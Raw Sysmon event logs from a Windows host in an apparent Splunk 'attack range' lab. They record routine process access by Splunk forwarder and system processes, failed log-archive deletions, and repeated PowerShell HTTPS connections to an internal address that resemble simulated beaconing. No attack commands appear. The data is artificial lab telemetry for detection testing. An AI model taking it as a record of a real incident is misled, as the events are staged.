13:16:38.601{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497287Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.601{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A0B6-6140-7D56-04000000C801}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497286Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.580{B81B27B7-A0B6-6140-7D56-04000000C801}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497285Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.564{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16ED206AFE22E4839D78E595E4077475,SHA256=CC30D56EF074CCCA996ADD572788652816D4F069375AFA48C596EA2D2D831D28,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497284Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.364{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=01972CDA8360AF4C4CC922F774B6A8DE,SHA256=F00C98FBD853A8348996100CCB0CEC5E87824F3A03AA462AC89A1CFEEB36467D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497283Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:38.064{B81B27B7-A0B5-6140-7C56-04000000C801}62086824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497306Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:39.590{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80CF441F253DA009ACCAE231B6FABA7A,SHA256=497C9EA9C57108300FA641EB3C3628197837CC056CCA8561FA66F210B36BE7C6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497305Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:39.312{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A0B7-6140-7E56-04000000C801}776C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497304Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:39.312{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A0B7-6140-7E56-04000000C801}776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497303Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:39.296{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497302Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:16:39.296{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497301Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:39.296{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497300Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:16:39.296{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497299Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:39.295{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A0B7-6140-7E56-04000000C801}776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497298Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:39.280{B81B27B7-A0B7-6140-7E56-04000000C801}776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497308Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:40.612{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A84B7A5B7E1CE8BA13C49E2AFABA2F46,SHA256=14E2305F812600C3007ACAEA224F1A67AEA71374B2F318C65B20715C94950B8D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497307Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:40.295{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1CD1DC7C7903F7BD1B9EE90A45EDC1E5,SHA256=2B6C4505EE26AF26FC9E38ED582D897E8F0C992A52D16C642038E4497FB513E8,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 354300x800000000000000036497310Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:10.831{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50517-false10.0.1.12-8000- 23542300x800000000000000036497309Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:41.631{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7229601227E04488FA2AEC13314EBA48,SHA256=157FF4E0997A4AF682ABAA8A76BFAD6DECD5DD412696CFF9DC1039E7F58E17E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497311Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:42.645{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80C32B84DEEEA5C8475BA63C072B83B1,SHA256=A1A2F84E49A4D0B8B47D65414DAE601256883F01AFAF6050323F5225B5704349,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497312Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:43.660{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A9AA0C77C42EEE251150A3E8DF70DBF,SHA256=EF08FA437F4984B2044F8C7D0F96E52D84958146F448458983E2254667BBB05D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497315Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:14.944{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50518-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497314Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:44.675{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3862601FEB6DC538C47B4522CDE65D4F,SHA256=C730E413D0A163674D0B47531D2A822F3E482E33DBD46C2F4E64958E8D850304,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497313Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:44.359{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D993B719AAC786BEF8B0FAEE85B34F99,SHA256=E7EEB8159CA21C4DEF6A0F17017640487D356730573F53F8082CE7688C5512DF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497317Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:15.842{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50519-false10.0.1.12-8000- 23542300x800000000000000036497316Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:45.707{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C90D7EE7713260329EB83355DF5AE390,SHA256=3F8BD787D53BD51B35473454BBBC848C36FF2DDB26AAE96F18E86484AAF4B539,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497318Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:46.773{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AEC3A980C65BE8CF677A0F1120A82B8,SHA256=B2424B373844080784DF5068B7028654985FF88FE816C9E647BEEA2B74B0D128,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497319Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:47.804{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D82A199663399C960D3ED0505FCAA803,SHA256=6D29EC7F54AF777CBF663407FD729D5BD0E96B45B413C52034560BA5D87350B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497320Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:16:48.823{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1313674D989530055B34C07823E9B3A,SHA256=10EEE41C2541AD2F1DF491A57B1048E2FF10E39A9BD5FF418E58C55449D40101,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497322Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:49.853{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2EF1DFAE4FC68912F69C3481B258C1B,SHA256=002EB1DA110C413D858C9B46F56CB7EE20C28CF76F60DB4C4C24C3DCF5DA6F44,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497321Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:49.354{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E2954807896EA54E97DB946E2ABA7272,SHA256=9CD7ECAEE8EEABAC217CD55EC6ABB91FA74BBD315449270E0512D9D18EF05638,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497325Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:20.853{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50521-false10.0.1.12-8000- 
354300x800000000000000036497324Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.954{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50520-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497323Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:50.868{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E09931445631A2E9C29A692009C9F84C,SHA256=148A2BAB4174DBA5D6D3193A77073E566412F82D3F6CA05A9BB38CC9ADE0A2FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497326Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:51.882{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF2F8911B203EC875250066AF724792E,SHA256=58318445C578E892CF457F5DA212B1DD32D970BB7E7440D39B52CD1712F5EFA9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497327Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:52.899{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9236D0DD6BFA7C161C35D39CF152008F,SHA256=B1FECFD973FF4CF3950C909FCD0C88591EA127D3A47938930521D07738729926,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000036497328Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:53.975{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7B4C4B2018D612AFDEE762FEB6359FA,SHA256=B67717448FC74136A75BB67BF516FCAB7FE0BA391B50B78D046CF53D6DE96B8A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497330Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:54.989{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BA13CF209093C6F530A2022595D3C73,SHA256=CA3232791173E9E9897D4E3DF059E40F5AE190CBBF4A97EFBEFD5C5DF691D36D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497329Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:54.359{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4EE17B92B352FA64D85738F12BBB0FB0,SHA256=7743E2B9C76471603230C7C1117B2496991E49E3EAE9EAE516F3B497E437A719,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497331Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:17:25.002{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50522-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497332Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:56.008{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C05B5CD7C5B55CD5237E3DD9D1D08A3,SHA256=AB034C4457808368835F7F7F3717C5D3AFCB0BFDEFFDCF7C25CFE4E3C25D7C5A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497334Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:26.888{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50523-false10.0.1.12-8000- 23542300x800000000000000036497333Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:57.025{B81B27B7-4024-611D-7300-00000000C801}2188NT 